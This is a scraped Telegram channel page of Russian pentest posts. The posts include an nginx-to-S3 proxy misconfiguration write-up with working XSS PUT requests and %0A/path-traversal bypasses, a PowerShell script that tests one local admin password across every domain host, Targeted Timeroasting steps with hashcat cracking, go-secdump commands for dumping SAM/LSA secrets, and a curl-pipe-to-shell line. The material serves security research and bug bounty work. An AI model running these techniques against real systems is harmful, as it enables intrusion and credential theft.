en
Feedback
Fsecurity | HH

Fsecurity | HH

Open in Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Show more
2 064
Subscribers
-224 hours
-67 days
+430 days
Posts Archive
\n\nЕсли же запрос попадает во внутреннее объектное хранилище, то атакующий может перебирать существующие в системе бакеты, часть из которых может разрешать создание объектов PUT запросом без авторизации. Что в результате также приведет к возможности проэксплуатировать XSS.\n\n\nНо чаще встречается ситуация, когда проксирование запросов производится только из одной папки, например:\nlocation /static/ {\n set $s3_name \"company-bucket\";\n set $s3_host \"storage.yandexcloud.net\";\n \n rewrite ^(.*)$ /$s3_name$1 break;\n \n proxy_pass https://$s3_host;\n\nНо даже в данном случае конфигурация будет уязвима из-за разницы обработок переданного пути. Правило location и rewrite работают с нормализованным путем, а proxy_pass, в котором указан URI без пути, отправит ненормализованное значение.\n\nТаким образом для эксплуатации уязвимости необходимо отправить запрос, который в нормализованном виде попадет в location /static/, но будет начинаться с бакета, который контролирует атакующий.\nhttp://example.tld/attacker-bucket/..%2Fstatic/foo%0Abar\n=\nhttps://storage.yandexcloud.net/attacker-bucket/..%2Fstatic/foo%0Abar\n\nКак и в прошлом примере наличие в имени объекта символов %0A и /../ не помешают эксплуатации, так как это не файловая система и такой объект можно создать PUT запросом.\n\nТакже, если вы планируете искать подобные мисконфиги блэкбоксом, то нужно учитывать, что ошибки NoSuchObject и NoSuchBucket часто заменяют на дефолтную страницу 404, что может помешать.\nОбойти это можно вызывая ошибки с кодом, отличным от 404, например отправляя PUT запрос без указания Content-Length.\n\nPUT /attacker-bucket/..%2Fstatic/foo%0Abar HTTP/1.1\nHost: example.tld\nConnection: close","datePublished":"2025-01-25T08:04:15Z","dateModified":"2025-01-25T08:04:15Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":160},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T10:49:36Z"}}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4289","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4289","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4289","headline":"⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows 22 января был опубликован публичный Proof-of-…","articleBody":"⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows\n\n22 января был опубликован публичный Proof-of-Concept (PoC) для эксплуатации уязвимости CVE-2025-0411. Данная уязвимость позволяет обойти защитный механизм Windows, известный как Mark-of-the-Web (MOTW).\nMark-of-the-Web (MOTW) — это механизм защиты, встроенный в Windows и некоторые программы Microsoft, который помогает защитить пользователей от потенциально небезопасного контента, загружаемого из интернета. Он добавляет специальный флаг (метаданные) к файлам, загруженным из внешних источников, чтобы операционная система и приложения знали, что файл был получен из недоверенного источника.\n\nКак работает Mark-of-the-Web?\nКогда файл (например, документ, исполняемый файл или архив) загружается из интернета с помощью браузера или другой программы, Windows добавляет специальный заголовок в метаданные файла. Этот заголовок сохраняется в виде альтернативного потока данных (Alternate Data Stream), который поддерживается файловой системой NTFS.\n\nНапример, для файла, загруженного из интернета, MOTW добавляется в виде строки:\n[ZoneTransfer]\nZoneId=3\n\nЗначение ZoneId определяет источник файла:\nZoneId=0: Мой компьютер (локальная зона, безопасная).\nZoneId=1: Локальная интрасеть.\nZoneId=2: Доверенные сайты.\nZoneId=3: Интернет (недоверенная зона).\nZoneId=4: Ограниченные сайты.\n\nСсылка на публичный PoC:\nhttps://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC","datePublished":"2025-01-24T20:56:42Z","dateModified":"2025-01-24T20:56:42Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":175},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T11:37:15Z"}}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4288","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4288","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4288","headline":"🔗Ссылка: https://www.securitylab.ru/news/555730.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/555730.php","datePublished":"2025-01-24T18:13:53Z","dateModified":"2025-01-24T18:13:53Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":154}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4287","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4287","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4287","headline":"Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Наш Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-01-24T16:17:49Z","dateModified":"2025-01-24T16:17:49Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":153}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4286","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4286","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4286","headline":"🔗Ссылка: https://opennet.ru/62602/","articleBody":"🔗Ссылка:\nhttps://opennet.ru/62602/","datePublished":"2025-01-24T16:08:34Z","dateModified":"2025-01-24T16:08:34Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":163}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4285","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4285","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4285","headline":"🔗Ссылка: https://www.securitylab.ru/news/555704.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/555704.php","datePublished":"2025-01-24T14:03:01Z","dateModified":"2025-01-24T14:03:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":152}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4284","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4284","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4284","headline":"🔗Ссылка: https://habr.com/ru/articles/875694/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/articles/875694/","datePublished":"2025-01-24T12:27:34Z","dateModified":"2025-01-24T12:27:34Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":139},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4283","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4283","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4283","headline":"Проверка локальных учетных записей Представим себе ситуацию, когда во время выполнения проекта мы обнаружили…","articleBody":"Проверка локальных учетных записей\nПредставим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи. \n\nСкрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет. \n\nfunction Check-LocalCredential{\n [CmdletBinding()]\n Param (\n [Parameter(Mandatory)]\n [string]\n $UserName,\n\n [Parameter(Mandatory)]\n [string]\n $Password\n )\n\n # Подключаем библиотеку для работы с учетными записями\n Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop\n\n # В качестве контекста используем машину\n $ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine\n\n $searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'\n $searcher.PageSize = 1000\n $comps=$searcher.FindAll()\n \n foreach($comp in $comps)\n {\n $ComputerName = $comp.Properties.dnshostname.Item(0)\n \n try\n {\n $PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)\n # Проверям учетные данные\n if($PrincipalContext.ValidateCredentials($UserName,$Password))\n {\n Write-Host -ForegroundColor Green \"[+] User $UserName has password $Password on computer $ComputerName\"\n }\n }\n catch [UnauthorizedAccessException]\n {\n Write-Host -ForegroundColor Yellow \"[*] User $UserName has password $Password on computer $ComputerName\"\n continue\n }\n catch \n {\n #Write-host -ForegroundColor Red \"[!] Error $_.Exception.Message \"\n continue\n }\n }\n} \n\nЗапускаем \n\nCheck-LocalCredential -Username Administrator -Password Qwerty123 \n\nЗеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный. \n\nСтоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов.\n\n\n#Powershell #Внутрянка","datePublished":"2025-01-24T10:05:18Z","dateModified":"2025-01-24T10:05:18Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":120},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T11:12:30Z"}}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4282","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4282","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4282","headline":"Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Наш Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-01-24T09:47:40Z","dateModified":"2025-01-24T09:47:40Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":126}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4281","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4281","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4281","headline":"Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею. В дв…","articleBody":"Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.\nВ двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash. \n\nСуть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:\n1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)\n2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце\nПосле этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш. \nХорошо, как можно это использовать?\n\n1 Сценарий.\nУ нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.\n\n2 Сценарий.\nЗахватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.\nОстальные сценарии придумайте сами :)\n\nСвежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:\ngit clone https://github.com/hashcat/hashcat && cd hashcat\ngit checkout 5236f3bd7 && make\n./hashcat -m31300\nДля атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync\nНазвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.","datePublished":"2025-01-24T08:05:25Z","dateModified":"2025-01-24T08:05:25Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":137},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T17:01:51Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4280","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4280","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4280","headline":"Добрый день, уважаемые подписчики! В сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi…","articleBody":"Добрый день, уважаемые подписчики!\n\nВ сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi типа Evil Twin, осуществляемую через поддельный портал авторизации с целью похищения данных. \n\nАктуальность данного материала обусловлена недостаточным качеством документации по инструментам, таким как eaphammer, которые позволяют проводить подобные атаки. \n\nhttps://teletype.in/@giscyberteam/captive_portal\n\n#WiFi #SocialEngineering","datePublished":"2025-01-23T20:24:02Z","dateModified":"2025-01-23T20:24:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":156},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T09:27:13Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4279","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4279","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4279","headline":"Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная о…","articleBody":"Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная она тем, что она практически базируется на принципах Secure by Design, что в целом забавно)) вообще, делать все как надо сразу - может и есть рецепт успеха?","datePublished":"2025-01-23T18:10:33Z","dateModified":"2025-01-23T18:10:33Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":153},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T05:59:01Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4278","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4278","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4278","headline":"🔗Ссылка: https://habr.com/ru/companies/bastion/articles/873850/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/companies/bastion/articles/873850/","datePublished":"2025-01-23T16:14:18Z","dateModified":"2025-01-23T16:14:18Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":172}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4277","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4277","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4277","headline":"🔗Ссылка: https://habr.com/ru/articles/873672/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/articles/873672/","datePublished":"2025-01-23T14:07:01Z","dateModified":"2025-01-23T14:07:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":147},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4276","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4276","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4276","headline":"🔄🖼️ go-secdump v0.4.0 Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на д…","articleBody":"🔄🖼️ go-secdump v0.4.0\n\nИнструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск\n\nДобавлено:\n\nAdded calculation of Kerberos AES Keys for the machine account password.\nCould be useful when NTLM auth is disabled\n\nПример:\n\n./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2\n\nRelay:\n\n./go-secdump --host 192.168.0.100 -n --relay\n\nОсновные опции:\n\n--host \n-P, --port \n-d, --domain \n-u, --user \n-p, --pass \n-n, --no-pass\n--hash \n--local\n-k, --kerberos\n--dc-ip\n--target-ip\n--aes-key\n--dump\n--sam\n--lsa\n--dcc2\n--relay\n--relay-port \n\n💻 Home\n💻 Download\n\n#soft #golang #redteam #gosecdump\n\n✈️ Pentest HaT","datePublished":"2025-01-23T12:07:02Z","dateModified":"2025-01-23T12:07:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":148}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T06:36:15Z"}}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4275","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4275","mainEntityOfPage":"https://telemetr.io/en/channels/1492997419-hellohackingteam/posts/4275","headline":"🔗Ссылка: https://opennet.ru/62594/","articleBody":"🔗Ссылка:\nhttps://opennet.ru/62594/","datePublished":"2025-01-23T10:03:49Z","dateModified":"2025-01-23T10:03:49Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/en/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":148}]}}]}
Repost from PurpleBear
Backdooring Your Backdoors - Another $20 Domain, More Governments Интересный ресерч от watchTowr из серии "hackers hacking hackers". В ходе исследования были проанализированы исходники различных веб-шеллов с открытым исходным кодом и обнаружены некоторые закладки недокументированные особенности😎 Например, некоторые возможно вспомнят историю с бэкдором в веб-шелле c99shcook, который сливал логопасы разработчику. Исследователи пошли дальше и зарегали на себя просроченные домены (40+), на которые отстукивались различные веб-шеллы и начали анализировать полученные доступы данные телеметрии😎 Результаты анализа включают около 4000 взломанных веб-серверов, в том числе несколько ресурсов в доменной зоне .gov, на которые заливались различные веб-шеллы🙈 В целом ничего нового и так было всегда, но заставляет задуматься о вечном том, что мы как security профессионалы по умолчанию обязаны читать исходники любых opensource инструментов, которые используем в инфраструктуре заказчиков. Но ведь иногда бывают ситуации, когда проверенного инструмента просто нет под рукой и необходимо принести его с гитхаба из репозитория уважаемого автора offensive утилит. Например, поставьте лайк👍 если когда-нибудь делали так: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh Автор linpeas в прошлом году проводил эксперимент и просто по фану в рамках повышения осведомленности временно добавил в свой скрипт сбор телеметрии, где именно используется его инструмент, подробности и скриншоты будут в комментариях. PS: Желаю всем удачного завершения рабочей недели и хороших выходных!

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from BlackFan
Небольшая заметка про уязвимую конфигурацию nginx при проксировании запросов на S3, которое позволило в том году налутать немного уязвимостей на BugBounty. Объектные хранилища, совместимые с S3 API, используют два варианта указания имени бакета в запросе. Virtual-hosted–style
GET /object-name HTTP/1.1
Host: bucket-name.s3endpoint
Path-style
GET /bucket-name/objectname HTTP/1.1
Host: s3endpoint
При использовании path-style варианта может возникнуть довольно неочевидная проблема с конфигурацией nginx. Рассмотрим на примере сайта, который проксирует запросы подставляя имя бакета в путь с помощью следующего rewrite правила. В примерах будет использоваться Yandex Object Storage, но информация актуальна для всех S3 хранилищ.
location / {
  set $s3_name "company-bucket";
  set $s3_host "storage.yandexcloud.net";
         
    rewrite ^(.*)$ /$s3_name$1 break;
         
    proxy_pass https://$s3_host;
В nginx rewrite применяется к нормализованному пути и если в нем присутствует символ переноса строки %0A, то данное регулярное выражение не сработает, поскольку в нем используются якоря начала и конца строки.
http://example.tld/test/test.html
=
https://storage.yandexcloud.net/company-bucket/test/test.html


http://example.tld/test/foo%0Abar
=
https://storage.yandexcloud.net/test/foo%0Abar
Что в результате приведет к возможности указать любое имя бакета в запросе. Причем декодированный символ %0A в имени объекта не помешает, так как S3 это не файловая система и такие имена разрешены. Таким образом, если используется публичное объектное хранилище, атакующий может создать в нем свой бакет с произвольным именем и загрузить на него файл foo%0Abar с XSS. Символ %0A в имени объекта должен быть декодированным, поэтому проще всего загрузить объект на него с помощью PUT запроса. В данном запросе подпись формируется с помощью Hackvertor тегов расширения для Burp Suite.
PUT /bucket-name/foo%0Abar HTTP/1.1
Host: storage.yandexcloud.net
Content-Type: text/html
Authorization: AWS ##ACCESS_KEY##:<@base64><@hex2ascii><@hmac_sha1('##SECRET-KEY##')><@d_burp_url>PUT%0A%0Atext/html%0A<@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>%0A/bucket-name/foo%250Abar<@/d_burp_url><@/hmac_sha1><@/hex2ascii><@/base64>
Date: <@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>
Content-Length: 25

<script>alert(1)</script>
Если же запрос попадает во внутреннее объектное хранилище, то атакующий может перебирать существующие в системе бакеты, часть из которых может разрешать создание объектов PUT запросом без авторизации. Что в результате также приведет к возможности проэксплуатировать XSS. Но чаще встречается ситуация, когда проксирование запросов производится только из одной папки, например:
location /static/ {
  set $s3_name "company-bucket";
  set $s3_host "storage.yandexcloud.net";
         
